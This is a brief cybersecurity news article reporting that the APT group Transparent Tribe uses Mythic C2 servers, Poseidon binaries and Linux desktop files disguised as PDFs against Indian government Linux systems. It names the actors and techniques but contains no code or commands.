HQ/EMEAFind out how we can help your business
The advanced persistent threat group Transparent Tribe has upgraded its malicious arsenal for its cybercriminal operations.
According to reports, the APT group has obtained new tactics that use the Mythic Poseidon binaries, hostile Linux desktop files, and a command-and-control infrastructure. Moreover, the researchers reveal that the group relies on 15 malicious hosts, most of which are DigitalOcean hosts, to control its operations.
The hosts are part of a Mythic C2 infrastructure, a post-exploitation framework for red teaming that hackers, including Transparent Tribe, widely exploit.
Transparent Tribe has upgraded its tactics significantly.
According to the investigation, these discoveries significantly upgrade the Transparent Tribe group’s overall capabilities. These upgrades, especially the use of Linux desktop input files, pose a threat to users in India.
Transparent Tribe’s deployment of these customised payloads, including the Mythic Poseidon binaries, demonstrates the group’s prioritisation of exploiting Linux-based systems. This transition in targeting Linux environments is most likely due to the prevalence of the Debian-based BOSS OS in Indian government institutions and the introduction of Maya OS.
On the other hand, the researchers revealed that they utilised the JARM fingerprinting and HTML metadata analysis to identify 15 servers running the Mythic C2 framework.
One of the key detected servers became the APT’s focal point, indicating a more extensive network of hosts. Furthermore, Transparent Tribe uses the Mythic framework to manipulate infected systems remotely, even though it was initially designed for legitimate pen testing. This infrastructure allows the group to establish persistence in infected devices.
The investigation also highlighted Transparent Tribe’s innovative attack of using Linux desktops as vectors for entering files masquerading as PDFs. Once targets execute these files, they can cause harmful behaviour, such as downloading and launching programs from remote servers.
The latest revelation of these new Transparent Tribe upgrades, especially the C2 infrastructure, demonstrates the APT group’s growth and sophistication when targeting Indian government sectors.
The group’s upgraded toolbox for cyber espionage operations has become more dangerous as they now use Mythic C2 and distribute malicious Linux binaries. Therefore, organisations must be wary of Transparent Tribe’s new tactics, particularly those in vital Indian sectors that use Linux-based systems.
